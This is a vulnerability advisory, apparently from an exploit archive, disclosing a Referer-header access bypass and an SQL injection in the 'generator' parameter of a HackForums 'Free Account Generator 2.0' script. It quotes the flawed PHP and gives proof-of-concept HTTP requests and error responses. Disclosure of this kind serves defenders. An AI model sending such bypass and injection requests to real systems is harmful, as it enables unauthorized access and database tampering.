HackForums FAG 2.0 - Multiple Vulnerabilities
Posted on 30 November -0001
<HTML><HEAD><TITLE>HackForums FAG 2.0 - Multiple Vulnerabilities</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY> ============================================================================================== [-] Title => HackForums FAG 2.0 - Multiple Vulnerabilities [-] Author => bRpsd (skype: vegnox) [-] Date Release => 22 August, 2016 [-] Vendor => HackForums, froy0z Title => Free Account Generator 2.0 Thread Post => http://hackforums.net/showthread.php?tid=4882268 Download => https://mega.nz/#!SdMSGaZY!XYCeFoYlX0FdDazJ_Q2TpjWOUBh37jvX3kJWSX6UsUA Vulnerable Version => 2.0 Tested Version => Latest, 2.0 on a Wamp Server ============================================================================================== Vulnerability #1 : Using the generator without even registration or purchasing a membership. Vuln File: /lib/generate.php Vuln Code: Line 3-6 /********************************************************************************* 3. $pos = strpos($_SERVER['HTTP_REFERER'],getenv('HTTP_HOST')); 4. if($pos===false){ 5. die('No Access'); 6. } *********************************************************************************/ strpos checks if the HTTP_REFERER matches with HTTP_HOST before generating data which make it possible for anyone to use the generator by simply changing the referer. [-] Proof Of Concept [-] http://localhost/lib/generate.php?generator=1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive If-None-Match: 1 Upgrade-Insecure-Requests: 1 Response: No Access [bypass] http://localhost/lib/generate.php?generator=1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/lib/generate.php?generator=1 Connection: keep-alive If-None-Match: 1 Upgrade-Insecure-Requests: 1 Response: test@account.com:123123 -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- Vulnerability #2 : SQL Injection Vuln File: /lib/generate.php Vuln Code: Line 10 & 34-40 /****************************************************************************************************************************************************************** 10. $generator = mysqli_real_escape_string($con, $_GET['generator']); 34. $result = mysqli_query($con, "SELECT * FROM `generator$generator` WHERE `status` != '0' ORDER BY RAND() LIMIT 1") or die(mysqli_error($con)); 35. if(mysqli_num_rows($result) < 1){ 36. exit("0 Accounts in stock"); 37. } 38. while($row = mysqli_fetch_array($result)){ 39. echo $row['alt']; 40. } ******************************************************************************************************************************************************************/ The mysqli_query use the parameter 'generator' in the SQL query, which makes it possible to interfer and send malicious commands to the DBMS. [-] Proof Of Concept [-] http://localhost/lib/generate.php?generator=1+3 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/lib/generate.php?generator=1+3 Connection: keep-alive Upgrade-Insecure-Requests: 1 If-None-Match: 1 Response: Table 'FAG_2sql1.generator1 3' doesn't exist http://localhost/lib/generate.php?generator=1`+TEST Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/lib/generate.php?generator=1`+TEST Connection: keep-alive Upgrade-Insecure-Requests: 1 If-None-Match: 1 Response: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '` WHERE `status` != '0' ORDER BY RAND() LIMIT 1' at line 1 </BODY></HTML>
